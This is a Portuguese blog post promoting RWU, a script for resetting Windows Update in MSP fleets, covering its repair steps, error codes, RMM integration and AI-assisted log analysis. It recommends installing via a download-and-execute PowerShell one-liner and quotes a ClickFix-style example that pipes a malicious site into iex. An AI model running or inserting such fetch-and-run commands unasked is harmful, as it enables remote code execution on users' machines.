Reset Windows Update: O Guia Definitivo de RWU para MSPs
O script de reset do Windows Update do Manuel Gil ultrapassou meio milhão de downloads antes de ele arquivá-lo em março de 2023. O sucessor em Dev-C++ — Reset-Windows-Update-Tool, 513 estrelas no GitHub — seguiu o mesmo caminho para o arquivo em 16 de janeiro de 2026. Durante anos, essas foram as ferramentas que os sysadmins usavam quando o solucionador de problemas da Microsoft dava de ombros e dizia “não conseguimos identificar o problema.”
Eles se foram. E nada os substituiu.
Pesquise “reset Windows Update” hoje e você vai encontrar um monte de guias para consumidores. Capturas de tela de painéis de Configurações. “Clique em Solucionar problemas, depois em Solucionadores adicionais.” A ironia: esse próprio solucionador está sendo descontinuado com a aposentadoria do MSDT. A Microsoft está aposentando sua própria ferramenta de reparo.
Para técnicos MSP gerenciando centenas de endpoints, a lacuna é pior. Você precisa de algo que rode silenciosamente pelo seu RMM. Algo que não vai destruir a configuração de anel do Intune que sua equipe passou três semanas ajustando. Algo que produza um código de saída estruturado, não uma caixa de diálogo GUI na frente da qual ninguém está sentado.
É por isso que construí o RWU. Não é mais um “truque mágico” para o Windows Update. É um fluxo de trabalho técnico de 14 passos, auditável e reversível, com padrões seguros, operações perigosas opcionais, códigos de saída CLI para automação e saída diagnóstica estruturada para análise com IA. Um único arquivo .cmd. GPL-3.0. Sem instalador, sem telemetria, sem persistência.
Os Três Baldes de Falhas
A maioria dos guias de Windows Update pula o diagnóstico e vai direto para a solução. Parar serviços, deletar SoftwareDistribution, reiniciar, cruzar os dedos. Isso funciona mais ou menos um terço das vezes. Nos outros dois terços, você perdeu vinte minutos e possivelmente piorou as coisas.
O problema é que falhas do Windows Update não são um problema. São três.
Balde 1: Corrupção do estado local. A pasta SoftwareDistribution está podre. Catroot2 tem incompatibilidades de hash. A fila de transferência do BITS está travada. Códigos clássicos: 0x80070002, 0x80073712. O pipeline de atualização da máquina está congestionado com seus próprios dados obsoletos. Um reset local — parar serviços, renomear pastas, re-registrar DLLs — resolve isso de forma confiável.
Balde 2: Conflitos de políticas. Esse é o que pega os MSPs. Uma máquina que apontava para um servidor WSUS ainda tem o cookie do registro. Um dispositivo gerenciado pelo Intune tem configurações conflitantes de anel do Windows Update for Business empilhadas sobre uma Group Policy residual de quando estava no domínio. Os sintomas parecem idênticos ao Balde 1. A solução é completamente diferente — e se você aplicar a solução do Balde 1 sem limpar o estado das políticas, estará de volta em uma semana.
Balde 3: A Microsoft quebrou algo. KB5089549 em maio de 2026 causou falhas 0x800f0922 porque a atualização cumulativa demandava mais espaço na partição EFI do que muitas máquinas tinham. KB5082063 em abril de 2026 travou o LSASS em Domain Controllers com Privileged Access Management, causando um loop infinito de reinicialização que exigiu o patch emergencial fora de banda da Microsoft KB5091157. Nenhum script de reset local corrige isso. Você precisa do patch correto, ou manutenção de partição, ou boot no ambiente de recuperação.
O perigo de confundir esses baldes é real. Uma abordagem de “parar todos os serviços e deletar tudo incluindo políticas do registro” corrige o Balde 1. Danifica catastroficamente o Balde 2 — você acabou de tirar um dispositivo gerenciado do seu anel de gerenciamento de atualizações. E desperdiça tempo precioso no Balde 3 enquanto um Domain Controller está em loop de reinicialização no seu ambiente de produção.
A arquitetura do RWU mapeia diretamente para esses baldes. Reparos do Balde 1 são o padrão. Operações do Balde 2 (exclusão de políticas, reset de SDDL) requerem ativação explícita. O Balde 3 é diagnosticado e sinalizado como “fora do escopo desta ferramenta — eis o que investigar em seguida.”
O Panorama de Ferramentas: Quem Faz o Quê
Aqui está o estado atual das ferramentas de reparo do Windows Update:
| Ferramenta | Status | Passos Individuais | Interface | Logs para IA? | Verificação Hash? |
|---|---|---|---|---|---|
| RWU | Ativo | Sim — 14 passos | TUI + CLI (0/1/2) | Sim | Sim (SHA256) |
| Microsoft WU Troubleshooter | Descontinuado com MSDT | Parcial | Só GUI | Não | N/A |
| ManuelGil Reset-Windows-Update-Tool | Arquivado jan 2026 | Sim | Menu TUI | Não | Não |
| ManuelGil Script-Reset-WU | Arquivado mar 2023 | Sim | Nenhuma | Não | Não |
| ChrisTitusTech/winutil | Ativo | Não | GUI | Não | Não |
| PSWindowsUpdate | Ativo | Sim | Cmdlet | Não | Assinatura do módulo |
O WinUtil merece destaque. Com aproximadamente 55.000 estrelas, a ferramenta do Chris Titus Tech é o utilitário Windows de código aberto mais visível. É excelente para debloating e configuração do sistema. Mas seu módulo de Updates apenas alterna entre políticas de atualização Default, Security-only e Disabled. Ele não repara componentes quebrados do Windows Update. Se alguém recomendar o WinUtil para uma corrupção do component store 0x80073712, está confundindo configurações de atualização com reparo de atualização.
As ferramentas do Manuel Gil eram as legítimas. O script .bat era simples e eficaz — parar serviços, renomear pastas, re-registrar DLLs. Exatamente o workflow KB971058 que a Microsoft costumava documentar. Mas nenhuma versão tinha códigos de saída para RMM, diagnósticos para IA, ou separação entre operações seguras e perigosas. Tudo rodava em sequência, toda vez.
O Que o RWU Realmente Faz
A Arquitetura de 14 Passos
Os passos do RWU se agrupam em fases lógicas:
Passo 0 — Diagnósticos. Antes de qualquer mudança, o RWU captura o estado do sistema: versão e build do SO, status dos serviços para wuauserv/cryptSvc/bits/msiserver/appidsvc, espaço em disco incluindo a partição EFI, as últimas 100 linhas do CBS.log (não o arquivo completo de centenas de megabytes), e entradas recentes do log de eventos do Windows Update. Essa saída é projetada para análise com IA.
Passos 1–2 — Parar serviços. Windows Update, Cryptographic Services, BITS, Windows Installer, Application Identity. O RWU espera por paradas limpas ao invés de forçar a terminação, o que evita corrupção de dados no component store.
Passos 3–5 — Limpar e reconstruir. SoftwareDistribution é renomeado com timestamp — SoftwareDistribution.bak.20260522-143022 — para que rodar a ferramenta duas vezes não falhe por uma pasta .bak existente. Catroot2 recebe o mesmo tratamento. Depois as DLLs principais do Windows Update são re-registradas: 34 DLLs de atl.dll até wuwebv.dll, cobrindo todo o pipeline de atualização e criptografia.
Passos 6–7 — PERIGOSOS (apenas com ativação explícita). O Passo 6 exporta e depois deleta as políticas do registro do Windows Update em HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate. O Passo 7 reseta os descritores de segurança dos serviços BITS e WU para os padrões do Windows. Ambos estão DESLIGADOS por padrão. Ambos requerem ativação explícita — um toggle no TUI ou flags CLI /policy e /sddl.
Passo 8 — Reparo de arquivos do sistema. sfc /scannow seguido de DISM /Online /Cleanup-Image /RestoreHealth. A combinação contra corrupção do component store. O RWU captura a saída para revisão diagnóstica.
Passos 9–10 — Stack de rede. Reset do Winsock e limpeza das configurações de proxy. Esses capturam casos onde falhas de atualização são na verdade corrupção do stack de rede.
Passos 11–14 — Finalização. Reiniciar os serviços parados, forçar um ciclo de detecção de atualizações, exportar o log de eventos e gerar um resumo com código de saída estruturado.
Padrões Seguros: Por Que os Passos 6 e 7 Estão Bloqueados
Essa é a decisão arquitetural que mais me importa.
O Passo 6 deleta políticas do registro do Windows Update. Em um PC doméstico independente, tudo bem. Em um dispositivo gerenciado pelo Intune, você acabou de destruir a associação ao anel do Windows Update for Business. O dispositivo vai de “anel Piloto, adiamento de 7 dias” para “não gerenciado, instalando o que a Microsoft empurrar agora.” Em uma máquina que ainda aponta para um servidor WSUS (sim, o WSUS foi descontinuado em setembro de 2024, mas muitos ambientes ainda o usam), você removeu o ponteiro WSUS e a máquina começa a puxar atualizações direto do CDN da Microsoft.
O Passo 7 reseta descritores de segurança dos serviços. Em um endpoint empresarial blindado onde ferramentas de segurança intencionalmente apertaram esses descritores, você acabou de quebrar essa postura.
Os guias de atualização do TroubleChute resetam políticas por padrão. As ferramentas do Manuel Gil rodavam tudo em sequência sem conceito de ativação passo a passo. O RWU separa operações seguras das destrutivas. O padrão é seguro. A opção nuclear está disponível — mas você tem que solicitar explicitamente.
Como Começar
Uma linha:
irm matbanik.info/rwu | iex
O que acontece: o launcher rwu.ps1 baixa do matbanik.info, busca o release mais recente do RWU no GitHub, verifica o hash SHA256, extrai Reset_WindowsUpdate.cmd e roda com um prompt de elevação UAC. Se o hash não bater, nada executa.
O modelo de confiança: código fonte GPL-3.0 no GitHub. Verificação SHA256 antes da execução. Um único arquivo .cmd — sem instalador, sem persistência, sem telemetria. Você pode auditar cada linha de código antes de tocar no seu endpoint.
Agora, o elefante na sala. O Blog de Segurança da Microsoft em agosto de 2025 marcou os cmdlets irm e iex do PowerShell como “muito prolíficos” em campanhas de engenharia social ClickFix. Atores de ameaça enganam usuários para rodar irm site-malicioso.com | iex e acabou o jogo.
A verificação de hash do RWU aborda isso diretamente. O launcher não baixa-e-executa cegamente. Ele baixa, verifica SHA256 contra o checksum publicado e só executa em caso de correspondência. Um caminho de download comprometido produz uma incompatibilidade de hash e o launcher aborta.
Se irm | iex ainda te incomoda — compreensível — baixe direto das GitHub Releases. O arquivo .cmd está ali. Verifique o hash você mesmo.
Códigos de Erro e o Que Significam
Códigos de erro do Windows Update são miséria hexadecimal. Aqui está um mapeamento dos mais comuns para o que realmente está quebrado e quais passos do RWU os abordam:
| Código de Erro | O Que Significa | Causa Raiz | Passos RWU |
|---|---|---|---|
| 0x80070002 | Arquivo/chave de registro faltando | Corrupção do SoftwareDistribution | Passos 3–5 |
| 0x800f0922 | Falha de staging do CBS | Esgotamento de espaço na partição EFI (maio 2026 KB5089549) | Passo 0 diagnostica; Passos 3–5 para staging |
| 0x80073712 | Component store corrupto | Incompatibilidade de manifesto no WinSxS | Passo 8 (DISM) |
| 0x800f081f | Arquivos fonte do DISM faltando | Sem fonte de reparo disponível | Passo 8 com /Source:wim |
| 0x80240069 | Reinicialização pendente | Atualização anterior requer reinício | Passos 11–14 |
| 0x8024402c | Não consegue alcançar servidores WU | Problema no stack de rede ou proxy | Passos 9–10 |
| 0x80244022 | Servidor indisponível | CDN da Microsoft bloqueado ou fora do ar | RWU diagnostica; problema de firewall/proxy |
| 0x8024401c | Timeout de conexão | Problema de proxy ou latência | Passos 9–10; pode precisar de regras de firewall |
O código 0x800f0922 merece atenção. KB5089549 em maio de 2026 o disparou amplamente porque a atualização cumulativa precisava de mais espaço na partição EFI do que muitas máquinas tinham. A Microsoft confirmou que máquinas com 10 MB ou menos de espaço livre na EFI entravam em loop de rollback a 35% da instalação. O diagnóstico do Passo 0 do RWU vai sinalizar espaço baixo na EFI. Ele não pode redimensionar a partição por você — mas pelo menos você vai saber que está perseguindo uma restrição de hardware, não uma corrupção de software.
Integração com RMM: Modo CLI para MSPs
O TUI é útil para troubleshooting interativo. Para deployment em frotas, você precisa do CLI.
Códigos de saída:
0— Sucesso. Todos os passos completados sem erros.1— Falha. Pelo menos um passo teve erro. Verifique o log.2— Erro de uso. Argumentos incorretos ou ajuda solicitada.
Flags CLI:
| Flag | Ação |
|---|---|
/diag | Apenas diagnósticos (Passo 0). Sem modificações. |
/reset | Reset seguro completo (Passos 1–5, 8–14). |
/step N | Executar passo específico. Válidos: 0, 1-2, 3, 4, 5, 6, 7, 8, 9-10, 11-14. |
/policy | Ativar Passo 6 (exclusão de políticas). Ativação explícita. |
/sddl | Ativar Passo 7 (reset de SDDL). Ativação explícita. |
/logdir "caminho" | Gravar logs em um diretório específico. |
Deployment silencioso:
Reset_WindowsUpdate.cmd /reset /logdir "C:\Temp\RWU"
Isso executa a sequência de reset seguro e grava logs em C:\Temp\RWU. O código de saída diz ao seu RMM se funcionou.
Exemplo de integração com NinjaRMM:
$logDir = "C:\Temp\RWU"
$result = Start-Process -FilePath "C:\Tools\Reset_WindowsUpdate.cmd" `
-ArgumentList "/reset /logdir $logDir" -Wait -PassThru
# Copiar logs para share central com prefixo do nome do computador
$centralShare = "\\SERVER\RWU-Logs"
Get-ChildItem -Path $logDir -Filter "*.log" | ForEach-Object {
$destName = "$($env:COMPUTERNAME)_$($_.Name)"
Copy-Item -Path $_.FullName -Destination "$centralShare\$destName" -Force
}
if ($result.ExitCode -eq 0) {
Ninja-Property-Set rwuStatus "Success"
} elseif ($result.ExitCode -eq 1) {
Ninja-Property-Set rwuStatus "Failed - Check logs"
# Criar ticket
} else {
Ninja-Property-Set rwuStatus "Usage error"
}
O passo de coleta de logs pega cada arquivo .log que o RWU gerou, prefixa o COMPUTERNAME da máquina e copia para um share UNC central. Depois de uma execução em toda a frota, \\SERVER\RWU-Logs contém FRONT-DESK-PC_RWU_20260522.log, DC01_RWU_20260522.log, etc. — tudo em um lugar. Substitua \\SERVER\RWU-Logs pelo seu próprio caminho de rede.
O mesmo padrão funciona com Datto, ConnectWise Automate ou qualquer RMM que suporte scripting PowerShell e parsing de códigos de saída.
O flag /diag é o subestimado. Rode em toda a sua frota antes do Patch Tuesday. Parse a saída. Identifique máquinas com pouco espaço EFI, serviços parados ou cookies de políticas obsoletos antes de empurrar a atualização cumulativa. Diagnósticos de pré-voo economizam mais tempo do que remediação pós-falha.
Diagnósticos Prontos para IA
CBS.log é onde vive o debugging do Windows Update. Também é onde carreiras de debugging vão morrer. O arquivo cresce rotineiramente para centenas de megabytes de telemetria granular de servicing. Encontrar a falha real nesse volume é tedioso mesmo para técnicos experientes.
O Passo 0 do RWU captura um snapshot diagnóstico estruturado — os dados relevantes, pré-processados para consumo de IA:
=== RWU Diagnostic Output === OS: Windows 11 Pro 24H2 (Build 26100.1742) Disk C: 47.2 GB free of 237.8 GB EFI Partition: 89 MB free of 100 MB [WARNING: LOW SPACE] Service Status: wuauserv: Running cryptSvc: Running bits: Running msiserver: Stopped CBS.log tail (last 100 lines): 2026-05-22 14:23:17, Error CBS Failed to resolve package: Package_for_KB5089549~31bf3856ad364e35~amd64~~26100.1742.1.0 [HRESULT = 0x800f0922]
Cole isso no ChatGPT, Claude ou Copilot com este prompt:
You are a Windows Update diagnostic expert. Below is the log output from RWU (Reset Windows Update utility). Analyze it and respond with a "Bottom Line" summary using exactly these questions: - What went wrong? - Is the hard drive failing? - Is my data safe? - Can it be fixed? - What caused this? - What's the risk if I wait? Keep answers to 1–2 sentences each. Use plain language a non-technical client would understand. Bold Yes/No answers where applicable. RWU log output: <paste log here>
O formato “Bottom Line” é o economizador de tempo. Você recebe um resumo pronto para o cliente que pode colar direto em um ticket ou email — sem tradução necessária. Revise a precisão, envie. Escrevi mais sobre ensinar à IA seus padrões de comunicação e avaliar outputs de IA para precisão em posts relacionados.
A sacada: enviar um CBS.log de 200 MB para um LLM é caro e geralmente estoura os limites de contexto. Enviar 100 linhas relevantes pré-processadas custa quase nada e dá à IA exatamente o que ela precisa.
Quando o RWU Não Vai Ajudar
Limites honestos constroem mais confiança do que confiança falsa. Eis o que o RWU não pode consertar:
Esgotamento da partição EFI. O Passo 0 diagnostica. O RWU não pode redimensionar partições. Você precisa do diskpart ou de um gerenciador de partições para estender a partição EFI, ou limpar entradas de boot obsoletas com bcdboot/bcdedit.
Loop de reinicialização LSASS em Domain Controllers. O KB5082063 de abril de 2026 trava o LSASS antes que qualquer ferramenta local possa rodar. Você precisa do patch fora de banda da Microsoft KB5091157 aplicado pelo ambiente de recuperação.
Falhas de inscrição ESU do Windows 10. Se o licenciamento Extended Security Update não está validado, atualizações falham com erros de licença. Isso é um problema de licenciamento, não de componentes WU.
Bloqueios no nível de rede. Se seu firewall bloqueia endpoints do CDN da Microsoft, resetar o stack de rede local não vai ajudar. O stack está OK. A política está bloqueando o tráfego.
Dano irrecuperável ao component store. Se DISM /RestoreHealth falha com “arquivos fonte não puderam ser encontrados” e você não tem um install.wim compatível, está diante de uma atualização in-place ou instalação limpa. O RWU diz que o DISM falhou — não pode conjurar arquivos fonte faltantes.
O Que Vem Depois
O código fonte do RWU está no GitHub. GPL-3.0. Dê uma estrela se for útil — visibilidade ajuda outros técnicos a encontrar a ferramenta. Issues estão abertos para bugs e solicitações de funcionalidades.
As ferramentas do Manuel Gil serviram a comunidade de administradores Windows durante anos. Quando foram arquivadas, deixaram uma lacuna que guias de consumo e utilitários de debloating não conseguiram preencher. O RWU continua de onde pararam — com os acréscimos que workflows MSP modernos exigem: códigos de saída que seu RMM pode parsear, padrões seguros que não vão destruir suas políticas gerenciadas, e saída diagnóstica projetada para o troubleshooting assistido por IA que está se tornando o novo normal.
O comando é irm matbanik.info/rwu | iex. Ou baixe do GitHub. De qualquer jeito — auditável, reversível, qualidade profissional.
Recursos
- RWU — Reset Windows Update (GitHub)
- RWU PowerShell Launcher
- ManuelGil/Reset-Windows-Update-Tool (arquivado)
- ManuelGil/Script-Reset-Windows-Update-Tool (arquivado)
- ChrisTitusTech/winutil
- PSWindowsUpdate (PowerShell Gallery)
- Descontinuação do MSDT — Microsoft Support
- Descontinuação do WSUS — Microsoft Tech Community
- Engenharia social ClickFix — Microsoft Security Blog
- Como ensinar hábitos à IA — e parar de se repetir
- Avaliando a IA como ferramenta de produtividade